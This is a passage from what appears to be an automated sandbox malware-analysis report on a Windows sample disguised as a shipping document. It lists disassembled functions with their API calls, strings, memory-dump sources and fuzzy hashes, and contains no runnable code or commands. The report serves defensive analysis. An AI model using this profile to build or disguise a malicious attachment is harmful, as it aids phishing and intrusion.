                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: 8fcf141cad7f2babc9315f0dea4ee15128e890b7a8e3568bacb97c692bc5e687
                    • Instruction ID: 18eb6e92f2ee07506176448f0b3be42dbbb4da3e31a1090871250f1004cf59ee
                    • Opcode Fuzzy Hash: 8fcf141cad7f2babc9315f0dea4ee15128e890b7a8e3568bacb97c692bc5e687
                    • Instruction Fuzzy Hash: 0051AB305483019BC710EF14E9D2AABB7E9EF84344F18682EF496772E2DB309949CB53
                    Function 00E09997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: 80a2868d01d1fef7fc7cc68556d20aa3037f45e6a1a49d19754312f527574538
                    • Instruction ID: eea38ee871b9b6a46ad8b4191f2cd3472557fae64bd72ddc23aec006ba3134da
                    • Opcode Fuzzy Hash: 80a2868d01d1fef7fc7cc68556d20aa3037f45e6a1a49d19754312f527574538
                    • Instruction Fuzzy Hash: D3410671A04205AFEB289F74DC46A7677E8EF44304F60646EE549F62D3EA319D81CB10
                    Function 00E87184 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E8719C
                    • CreateMenu.USER32 ref: 00E871B7
                    • SetMenu.USER32(?,00000000), ref: 00E871C6
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87253
                    • IsMenu.USER32(?), ref: 00E87269
                    • CreatePopupMenu.USER32 ref: 00E87273
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E872A0
                    • DrawMenuBar.USER32 ref: 00E872A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 145b8f019ca28893bb16aaeb3db6ede4205c905b1866b4b28854d2652f5b355d
                    • Instruction ID: bf902dcc804e063eee1d28732e4e68384ec330580db5d125c498db7bf25cd056
                    • Opcode Fuzzy Hash: 145b8f019ca28893bb16aaeb3db6ede4205c905b1866b4b28854d2652f5b355d
                    • Instruction Fuzzy Hash: 794135B5A01209EFDB10EF65D888A9A7BF9FF49300F244129F949A7360D731AD14CBA0
                    Function 00E874ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                    Download Yara Rule
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E87590
                    • CreateCompatibleDC.GDI32(00000000), ref: 00E87597
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E875AA
                    • SelectObject.GDI32(00000000,00000000), ref: 00E875B2
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E875BD
                    • DeleteDC.GDI32(00000000), ref: 00E875C6
                    • GetWindowLongW.USER32(?,000000EC), ref: 00E875D0
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E875E4
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E875F0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: ed867901f020f9cf73b67c17645e129e8b9aed5252e4f4f28ff7306eed3aca8c
                    • Instruction ID: 7e79e60d26b6877c8d9dd6e7f71a24f88bf39d9840d502f37630a3c6d48d8392
                    • Opcode Fuzzy Hash: ed867901f020f9cf73b67c17645e129e8b9aed5252e4f4f28ff7306eed3aca8c
                    • Instruction Fuzzy Hash: 90318C72105214AFDF11AFA5DC08FDA3B69EF09325F201224FA5DB60A0C731D854DBA0
                    Function 00E26F80 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E26FBB
                      • Part of subcall function 00E28CA8: __getptd_noexit.LIBCMT ref: 00E28CA8
                    • __gmtime64_s.LIBCMT ref: 00E27054
                    • __gmtime64_s.LIBCMT ref: 00E2708A
                    • __gmtime64_s.LIBCMT ref: 00E270A7
                    • __allrem.LIBCMT ref: 00E270FD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E27119
                    • __allrem.LIBCMT ref: 00E27130
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2714E
                    • __allrem.LIBCMT ref: 00E27165
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E27183
                    • __invoke_watson.LIBCMT ref: 00E271F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                    • Instruction ID: 6c56220cda8446ecf4053f9be77c62768d993a225571964a8e63f1a6013def93
                    • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                    • Instruction Fuzzy Hash: 0D710871A01726ABEB149F79EC42B6AB7E8AF01324F146229F554F7281EB70ED50C7D0
                    Function 00E6281F Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E6283A
                    • GetMenuItemInfoW.USER32(00EC5890,000000FF,00000000,00000030), ref: 00E6289B
                    • SetMenuItemInfoW.USER32(00EC5890,00000004,00000000,00000030), ref: 00E628D1
                    • Sleep.KERNEL32(000001F4), ref: 00E628E3
                    • GetMenuItemCount.USER32(?), ref: 00E62927
                    • GetMenuItemID.USER32(?,00000000), ref: 00E62943
                    • GetMenuItemID.USER32(?,-00000001), ref: 00E6296D
                    • GetMenuItemID.USER32(?,?), ref: 00E629B2
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E629F8
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62A0C
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62A2D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: e920aa8671ab5e93446aaf6733fb5979915491bedc29f536aad53de8018575be
                    • Instruction ID: e5cff2410a28460829a2f2147b88fef11442bcb43940c6bf1348bb1cee8751ac
                    • Opcode Fuzzy Hash: e920aa8671ab5e93446aaf6733fb5979915491bedc29f536aad53de8018575be
                    • Instruction Fuzzy Hash: E761D370940A49AFDB25CFA4EC88DBE7BB8EB84388F14106DFA41B7251D771AD45DB20
                    Function 00E86F55 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E86FD7
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E86FDA
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E86FFE
                    • _memset.LIBCMT ref: 00E8700F
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E87021
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E87099
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 53a3b0b1f20006318224dbc6bcd9c3a3f1444f7652e70f27ef2375e11e4f3d87
                    • Instruction ID: 39d1f87dd5809a55828f1dc9ee933e5aca3eb5c9997453cbbd7a5ed2dbff1f32
                    • Opcode Fuzzy Hash: 53a3b0b1f20006318224dbc6bcd9c3a3f1444f7652e70f27ef2375e11e4f3d87
                    • Instruction Fuzzy Hash: 48618F71A00208AFDB10DFA4CC85EEE77F8EB09704F14016AFA58BB2A1C771AD45DB50
                    Function 00E56EEE Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E56F15
                    • SafeArrayAllocData.OLEAUT32(?), ref: 00E56F6E
                    • VariantInit.OLEAUT32(?), ref: 00E56F80
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E56FA0
                    • VariantCopy.OLEAUT32(?,?), ref: 00E56FF3
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E57007
                    • VariantClear.OLEAUT32(?), ref: 00E5701C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00E57029
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E57032
                    • VariantClear.OLEAUT32(?), ref: 00E57044
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E5704F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: 61058266554206b86cd02dcfaf76c7a9d265317fcbf760ce862cbe8cc1b00eb0
                    • Instruction ID: d8ef007335679040fbe7ce19ff0a49f8f802acc92bf950ce6aa3fb8ecfbbd7eb
                    • Opcode Fuzzy Hash: 61058266554206b86cd02dcfaf76c7a9d265317fcbf760ce862cbe8cc1b00eb0
                    • Instruction Fuzzy Hash: 88414235A002199FCB04DFA5D844DAEBBF9FF48355F009469E959F7261CB30A949CFA0
                    Function 00E75848 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 00E758A9
                    • inet_addr.WSOCK32(?,?,?), ref: 00E758EE
                    • gethostbyname.WSOCK32(?), ref: 00E758FA
                    • IcmpCreateFile.IPHLPAPI ref: 00E75908
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75978
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E7598E
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E75A03
                    • WSACleanup.WSOCK32 ref: 00E75A09
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 121eba232cb3f64398d818871086d83dc4cc826d38fa95f82e1ec28086cc03d6
                    • Instruction ID: 611de7b5cabe1c25cc0d15ec4a877f8d33dc5067d8593a7df0998a1dfe8bd86e
                    • Opcode Fuzzy Hash: 121eba232cb3f64398d818871086d83dc4cc826d38fa95f82e1ec28086cc03d6
                    • Instruction Fuzzy Hash: 8E517F32604700DFD7119F65CC85B2AB7E4AB88724F149929F9AAF72E1DB70EC44CB42
                    Function 00E6B54F Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00E6B55C
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E6B5D2
                    • GetLastError.KERNEL32 ref: 00E6B5DC
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00E6B649
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: cf8a6663394b8db99a78a25bc693c07afbf99e38c9ea872ef7bec41adf785286
                    • Instruction ID: 92621594e0976e3e27069a8cda74ac1d83e6f96f9b4fc8349d8cea8f79bf2674
                    • Opcode Fuzzy Hash: cf8a6663394b8db99a78a25bc693c07afbf99e38c9ea872ef7bec41adf785286
                    • Instruction Fuzzy Hash: 94319235A802099FCB10DF68E985EEE77B4FF04394F145065F516F7292DB709986CB90
                    Function 00E59251 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E592D6
                    • GetDlgCtrlID.USER32 ref: 00E592E1
                    • GetParent.USER32 ref: 00E592FD
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E59300
                    • GetDlgCtrlID.USER32(?), ref: 00E59309
                    • GetParent.USER32(?), ref: 00E59325
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E59328
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: c03f73b0f45fc703e3b9513637f8a186bda6a40482cacc822955cf49b304354c
                    • Instruction ID: 15d6a888500cfd9ccf519cc77b03a34d8e8efd9e3f4abd42c15096e1531e3026
                    • Opcode Fuzzy Hash: c03f73b0f45fc703e3b9513637f8a186bda6a40482cacc822955cf49b304354c
                    • Instruction Fuzzy Hash: A921A174A00204BFDF04AB61CC859EEBBA4EF49310F101665F961B72E2DA755859DB20
                    Function 00E5933C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E593BF
                    • GetDlgCtrlID.USER32 ref: 00E593CA
                    • GetParent.USER32 ref: 00E593E6
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E593E9
                    • GetDlgCtrlID.USER32(?), ref: 00E593F2
                    • GetParent.USER32(?), ref: 00E5940E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E59411
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: fa6db13bbfe21d9f1e0071e6ef43d1edd18210e7da2e30542cd7726fbc6e152f
                    • Instruction ID: 03dbd8a1a115869df3e265a6782dd49bb78988c1c888d704d69b79b5662b5d63
                    • Opcode Fuzzy Hash: fa6db13bbfe21d9f1e0071e6ef43d1edd18210e7da2e30542cd7726fbc6e152f
                    • Instruction Fuzzy Hash: 7F21C470A00204BFDF04AB65CC85EFEBBB8EF48300F101525F961B72A2DB755959EB20
                    Function 00E59425 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32 ref: 00E59431
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00E59446
                    • _wcscmp.LIBCMT ref: 00E59458
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E594D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: 62250bd50565deee4f83059ac9f25048271d8a1e45ab3b0e90b4f62762a01597
                    • Instruction ID: 4ac9a3cd072d8695019745617afcba199c5331900db01a2b99da3c6cd91a662f
                    • Opcode Fuzzy Hash: 62250bd50565deee4f83059ac9f25048271d8a1e45ab3b0e90b4f62762a01597
                    • Instruction Fuzzy Hash: 26113636248317FAFA102630AC07DE7339C8B44325F206027FE24F04E2FA656C4A4A90
                    Function 00E614FF Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00E61521
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E60599,?,00000001), ref: 00E61535
                    • GetWindowThreadProcessId.USER32(00000000), ref: 00E6153C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60599,?,00000001), ref: 00E6154B
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E6155D
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60599,?,00000001), ref: 00E61576
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60599,?,00000001), ref: 00E61588
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E60599,?,00000001), ref: 00E615CD
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E60599,?,00000001), ref: 00E615E2
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E60599,?,00000001), ref: 00E615ED
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 2dc386e484973882847dec2259628060c36e802cf48b995c29f2765aa846e5c4
                    • Instruction ID: a4c0ca44e88595544b577e7881405d2eb285278d9651f816c6a39de6116c30c0
                    • Opcode Fuzzy Hash: 2dc386e484973882847dec2259628060c36e802cf48b995c29f2765aa846e5c4
                    • Instruction Fuzzy Hash: AD31F771640204BFDF129F52FC44F6AB7A9EF84355F14406AF817F61A0DB759D448B50
                    Function 00E79228 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
